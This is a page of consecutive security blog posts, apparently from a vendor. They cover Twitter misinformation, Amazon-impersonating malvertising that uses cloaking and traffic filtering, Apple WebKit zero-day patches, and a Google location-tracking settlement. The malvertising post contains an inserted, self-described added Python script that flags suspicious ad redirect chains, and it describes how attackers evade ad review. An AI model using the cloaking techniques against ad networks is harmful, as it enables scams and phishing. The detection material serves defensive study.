The very best you can do is follow the Government or emergency response accounts which sport the grey badge. There are also gold checkmarks for “verified organisations”, but even there problems remain. A fake Disney Junior account was recently granted a gold checkmark out of the blue and chaos ensued.

No, South Park is not coming to Disney Junior.

As for the aim of the accounts pushing misinformation, it’s hard to say. Many paid accounts simply want to troll. Others could be part of dedicated dis/misinformation farms, run by individuals or collectives. It’s also common to see accounts go viral with content, and then switch to something else entirely once enough reach has been gained. It might be about a different topic, or it could be something harmful.

Even outside the realm of paid accounts, misinformation and fakes can flourish. Just recently, Twitter experienced a return of fake NHS nurses, after having experienced a similar wave back in 2020.

Should any of the fake nurse accounts decide to pay $8 a month, they’ll have the same posting power as the profiles pushing fake explosions. Spam is becoming a big problem in both public posts and private messages:

AI is already capable of producing realistic-looking images, yet the spammers and scammers are using any old picture without care for how convincing it looks. The combination of “breaking news” messaging and an official-looking checkmark easily tips it over the edge, and those liable to fall for it simply don’t examine imagery in detail in the first place. Twitter is going to have to invest some serious time into clamping down on spam and bots, which naturally help feed the disinformation waves. The big question is: can the embattled social media giant do it?


Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Malvertising via brand impersonation is back again

Web search is about to embark on a new journey thanks to artificial intelligence technology that online giants such as Microsoft and Google are experimenting with. Yet, there is a problem when it comes to malicious ads displayed by search engines that AI likely won’t be able to fix.

In recent months, numerous incidents have shown that malvertising is on the rise again and affecting the user experience and trust in their favorite search engine. Indeed, Search Engine Results Pages (SERPs) include paid Google ads that in some cases lead to scams or malware.

One particularly devious kind of malvertising is brand impersonation where criminals are buying ads and going as far as displaying the official brand’s website within the ad snippet. We previously reported several incidents to Google and it appeared that those ads using official URLs were no longer getting through. However, just recently we noticed a surge in new campaigns again.

Brand abuse: Scammers exploit users’ trust

It only takes a few seconds between a search and a click on a result, and most of the time that click happens to be on whatever shows up first. This is why advertisers are buying ads on search engines, not only to drive traffic towards their brands but also to outpace potential competitors. Unfortunately, not all advertisers have good intentions and the worst of them will exploit anything they can to put out ads that are malicious.

Over about a week we pulled some examples, focusing on Amazon-related searches since it is a popular search term (although other popular brands are affected as well). The ads we found were not only claiming to be Amazon’s official website, they also displayed the amazon.com URL in the ad.

Figure 1a: Malicious advert
Figure 1b: Related network traffic

Figure 2a: Malicious advert
Figure 2b: Related network traffic

Figure 3a: Malicious advert
Figure 3b: Related network traffic

Figure 4a: Malicious ad
Figure 4b: Related network traffic

Figure 5a: Malicious ad
Figure 5b: Related network traffic

Below is an animation showing what happens when a victim clicks on one of those ads:

Figure 6: Malicious advert leads to phishing page

While most of the brand impersonations we have seen recently are pushing tech support scams, this is not the only threat facing consumers. For example, we saw an ad that pretended to be Amazon’s login page but instead redirected users to a phishing site, first stealing their password before collecting their credit card number.

Figure 7: A malicious ad leading to a phishing site

How are these criminals evading detection?

Ad URL

Part of the problem here is that advertisers can be legitimate affiliates and associated with the Amazon brand. Here’s an example of a seller that is advertising on Google and has their own page as an affiliate on Amazon:

Figure 8: An advertiser leveraging the Amazon brand correctly

The problem comes when an advertiser that displays a brand’s official URL within the ad snippet (i.e. https://www.amazon.com) is allowed to submit an ad URL that has nothing to do with that brand. We have seen many examples that include URL shorteners, cloaking services or domains freshly registered for the sole purpose of malicious activity.

Figure 9: Incidents related to Amazon searches tracked in malvertising spreadsheet

The screenshot above is part of a document we have shared with Google where we and other researchers track new malvertising campaigns ranging from scams to malware distribution.

Anti-bot traffic funneling and cloaking

Threat actors often rely on traffic filtering services to push malicious content exclusively to intended victims. Practically all the malicious ads we showed earlier used a kind of traffic distribution and filtering system. This market is a bit of a gray area with some companies advertising as anti-bot or anti-fraud providers while others are shamelessly advertising in places frequented by online criminals.

The goal is not only to game Google’s and other ad networks’ review but also to ensure that only qualified traffic is allowed to come through. With most malvertising from click ads, the practice comes down to something called cloaking.

With cloaking, two types of URLs are used: the legitimate URL (or decoy) and the money URL (the malicious one). In the picture below we see such parameters as well as the threat actor’s money page, which contains folders for its Amazon (amz) and YouTube (ytb) malvertising campaigns; YouTube is another keyword abused by malvertisers:

Figure 10: Cloaking parameters showing the money page

In this specific case we discovered a number of domains registered by the scammer, serving more or less the same purpose. One important thing to remember is that these domains are not immediately seen by Google. For example, the traffic filtering service will detect if a click is from a real user or a machine. It can then decide to forward the bogus click to Amazon’s website and therefore maintain its cover.

Figure 11: Infrastructure used to redirect Google ads to tech support scams

For real traffic, these domains act as intermediaries to the payload pages, which tend to be highly disposable and ever changing. There is a simple reason: the payload pages are clearly malicious and will get reported and taken down. However, it is rare for the malvertising infrastructure itself to be disrupted, because it sits further upstream and is rarely documented properly. This allows threat actors to continue with their malicious ad campaigns and simply swap payload pages.
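The two checks described above (an ad snippet that displays the brand’s official URL while the click URL goes through a shortener, lookalike or cloaking domain, and a filtering hop that sends crawlers to the decoy URL and real users to the money URL) as an added example; this is not the blog’s or Google’s code, every host except amazon.com and tinyurl.com is a constructed .example placeholder, and the decoy/money query parameter names are assumed.

```python
"""Ad redirect-chain checks (added example; not the blog's or Google's code).

Models two things the post describes: an ad snippet that shows the brand's
official URL while the click goes via a shortener, lookalike or cloaking
domain, and a filtering hop that sends crawlers to the decoy (the real brand
site) and real users to the "money" page. Every host except amazon.com and
tinyurl.com is a constructed .example placeholder; query names are assumed.
"""
from difflib import SequenceMatcher
from urllib.parse import urlparse

SHORTENERS = {"tinyurl.com"}   # shortener named in the post
LOOKALIKE_RATIO = 0.75         # label similarity treated as a brand lookalike

def registrable_domain(url: str) -> str:
    """Crude eTLD+1: last two hostname labels (enough for this demo)."""
    host = (urlparse(url).hostname or "").lower()
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host

def looks_like(domain: str, brand: str) -> bool:
    """Misspelled or padded brand label, e.g. amaazoon or amazonsell."""
    d, b = domain.split(".")[0], brand.split(".")[0]
    return d != b and (b in d or SequenceMatcher(None, d, b).ratio() >= LOOKALIKE_RATIO)

def analyze_chain(display_url: str, hops: list[str]) -> dict:
    """Compare the URL shown in the ad with the redirect chain a click produced.
    hops: ordered URLs after the click (ad URL first, landing page last)."""
    brand = registrable_domain(display_url)
    chain = [registrable_domain(u) for u in hops]
    findings = []
    if chain[0] != brand:
        findings.append(f"ad URL domain {chain[0]} differs from displayed {brand}")
    if any(d in SHORTENERS for d in chain):
        findings.append("URL shortener in redirect chain")
    findings += [f"brand lookalike domain: {d}" for d in chain if looks_like(d, brand)]
    if chain[-1] != brand:
        findings.append(f"landing domain {chain[-1]} is not {brand}")
    return {"brand": brand, "landing": chain[-1], "findings": findings,
            "suspicious": bool(findings)}

def cloaking_divergence(display_url: str, bot_hops: list[str], user_hops: list[str]) -> dict:
    """Same ad clicked as a crawler and as a real browser: a crawler that reaches
    the brand while the user lands elsewhere is the decoy/money-URL pattern."""
    bot = analyze_chain(display_url, bot_hops)
    user = analyze_chain(display_url, user_hops)
    return {"bot_landing": bot["landing"], "user_landing": user["landing"],
            "cloaked": bot["landing"] == bot["brand"] and user["landing"] != user["brand"]}

# Constructed sample chains (the tinyurl path and every .example host are made up).
DISPLAY = "https://www.amazon.com"
CLOAK = "https://cloak.example/go?decoy=amazon.com&money=tss"
BOT_HOPS = ["https://tinyurl.com/constructed-demo", CLOAK,
            "https://www.amazon.com/"]              # crawler is sent to the decoy
USER_HOPS = ["https://tinyurl.com/constructed-demo", CLOAK,
             "https://amaazoon.example/amz/",        # lookalike "money" page
             "https://tss-alert.example/"]           # tech support scam landing

if __name__ == "__main__":
    print(analyze_chain(DISPLAY, USER_HOPS))
    print(cloaking_divergence(DISPLAY, BOT_HOPS, USER_HOPS))
```

A clean affiliate ad (Figure 8 above) produces no findings because every hop stays on the brand’s registrable domain.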

Can Bard fix Google’s malvertising problem?

We asked Google’s AI chatbot Bard if it could fix the malvertising problem that seems to be plaguing its search engine. At first Bard said it was not able to solve this issue:

Figure 12: Bard answering a query about malvertising

However, on a second attempt Bard claimed it could after all help to fix the malvertising problem:

Figure 13: Bard answering the same question in a different way

Regardless, malvertising is a complex issue and given the billions of daily ad impressions, it’s easy for someone nefarious to abuse any given platform. But we don’t need AI to identify certain elements that allow threat actors to impersonate brands. Also, while educating users about malvertising is important, we can’t blame them for clicking on paid ads that are supposedly verified as trusted.

Needless to say, these incidents will encourage users to install ad blockers, to the chagrin of publishers whose revenues are heavily dependent on advertising. In the end, it comes down to the user experience and ensuring that it comes first, before anything else.

We then asked for some tips to protect against malvertising. We couldn’t help but notice that Bard suggested using an ad blocker, although a small disclaimer at the bottom clearly states that Bard may display information that does not represent Google’s views. Indeed, the ad industry accounts for almost 80% of Google’s revenues.

Figure 14: Bard offers some tips on how to protect from malvertising

Malvertising has been a problem for many years and it’s unlikely to change any time soon. It’s important for users to be aware that criminals can buy ads and successfully bypass security mechanisms all the while impersonating well-known brands. If you decide to type the URL in the address bar instead, remember to be careful not to make a typo. This is another area that is highly targeted by typosquatters and can also involve malvertising redirects.

All of the ads mentioned in this blog post have been reported to Google. We would like to thank the people working in the ad unit for their continued support.

Indicators of Compromise


Malwarebytes Browser Guard provides additional protection to standard ad-blocking features by covering a larger area of the attack chain all the way to domains controlled by attackers. Thanks to its built-in heuristic engine it can also proactively block never-before-seen malicious websites.

We always recommend using a layered approach to security and for malvertising you will need web protection combined with anti-malware protection. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against such threats.


Update now! Apple issues patches for three actively used zero-days

Apple has rolled out security updates for Safari 16.5, watchOS 9.5, tvOS 16.5, iOS 16.5, iPadOS 16.5, iOS 15.7.6, iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Ventura 13.4, and macOS Monterey 12.6.6.

Among the security updates were patches for three actively exploited zero-day vulnerabilities. All these actively exploited vulnerabilities are directly related to the WebKit browser engine.

WebKit is the engine that powers the Safari web browser on Macs as well as all browsers on iOS and iPadOS (all web browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux.

Devices impacted by the identified exploits include:

  • All iPad Pro models
  • iPad Air (3rd generation and later)
  • iPad (5th generation and later)
  • iPad Mini (5th generation and later)
  • iPhone 6s and later models
  • Mac workstations and laptops running macOS Big Sur, Monterey, and Ventura
  • Apple Watch (series 4 and later)
  • Apple TV 4K and HD

The updates may already have reached you in your regular update routines, but it doesn’t hurt to check if your device is at the latest update level. If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE containing the information about the new zero-day is:

  • CVE-2023-32409: An issue where a remote attacker may be able to break out of the Web Content sandbox was addressed with improved bounds checks.

The notes about the security updates also revealed some information about Apple’s Rapid Security Response (RSR) update we reported on earlier this month.

RSR is a new type of software patch delivered between Apple’s regular, scheduled software updates. Previously, Apple security fixes came bundled along with features and improvements, but RSRs only carry security fixes. They’re meant to make the deployment of security improvements faster and more frequent.

We now know that the CVEs patched in that RSR update are listed as:

  • CVE-2023-28204: An out-of-bounds read issue in WebKit was addressed with improved input validation. Processing web content may disclose sensitive information.
  • CVE-2023-32373: A use-after-free issue in WebKit was addressed with improved memory management. Processing maliciously crafted web content may lead to arbitrary code execution.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions. This could allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

Use after free (UAF) is a vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Google to pay $40m for “deceptive and unfair” location tracking practices

Google is going to pay $39.9 million to Washington State to put to rest a lawsuit about its location tracking practices which has been in play since last year. Google was accused of “misleading consumers” by State Attorney General Bob Ferguson. From the AG press release:

Attorney General Bob Ferguson today announced Google will pay $39.9 million to Washington state as a result of his office’s lawsuit over misleading location tracking practices. Google will also implement a slate of court-ordered reforms to increase transparency about its location tracking settings.

Ferguson’s lawsuit against Google asserted that the tech giant deceptively led consumers to believe that they have control over how Google collects and uses their location data. In reality, consumers could not effectively prevent Google from collecting, storing and profiting from their location data.

The lawsuit itself, announced back in January 2022, claimed Google used a “number of deceptive and unfair practices” to obtain user consent for tracking. Practices highlighted included “hard to find” location settings, misleading descriptions of location settings, and “repeated nudging” to enable location settings alongside incomplete disclosures of Google’s location data collection.

These practices were set alongside the large amount of profit Google generated from using consumer data to sell advertising. Google made close to $150 billion from advertising in 2020, and the case pointed out that location data is a key component of said advertising. As per the Attorney General:

(Google) has a financial incentive to dissuade users from withholding access to that data.

The location based argument is focused on the discrepancy between claims related to what data Google stores in theory with location data turned off, and what it obtains in practice:

When users enable a setting called “Location History,” Google saves data on users’ location to, as it says in its account settings, “give you personalised maps, recommendations based on places you’ve visited, and more.”

Google told users that when Location History was disabled, the company did not continue to store the user’s location. For years, Google’s help page stated, “With Location History off, the places you go are no longer stored.” That statement was false. For example, the company collects location data under a separate setting — “Web & App Activity” — that is defaulted “on” for all Google Accounts.

The consent decree filed on Wednesday means Google will need to be more transparent with regard to tracking. The search engine giant will also need to provide more detailed information in cases where location technologies are involved.

AG Ferguson had this to say:

Google denied Washington consumers the ability to choose whether the company could track their sensitive location data, deceived them about their privacy options and profited from that conduct. Today’s resolution holds one of the most powerful corporations accountable for its unethical and unlawful tactics.

Google has been on the receiving end of legal action led by Ferguson for some time now. Just last month, he partnered with the US Department of Justice and a bipartisan group of attorneys general for an antitrust lawsuit aiming to break up Google’s monopolisation of display advertising. There have also been other antitrust lawsuits in this space, and in 2021 Google paid $423,659.76 in relation to violating the state’s campaign finance disclosure law.

We still don’t know how these proposed changes will take shape in terms of what consumers will see. “…with no federal law governing online privacy in the United States, state regulators are forced to make do with what they have” according to Android Central. With Ferguson showing no signs of letting up, Washington State is taking that philosophy to the max.

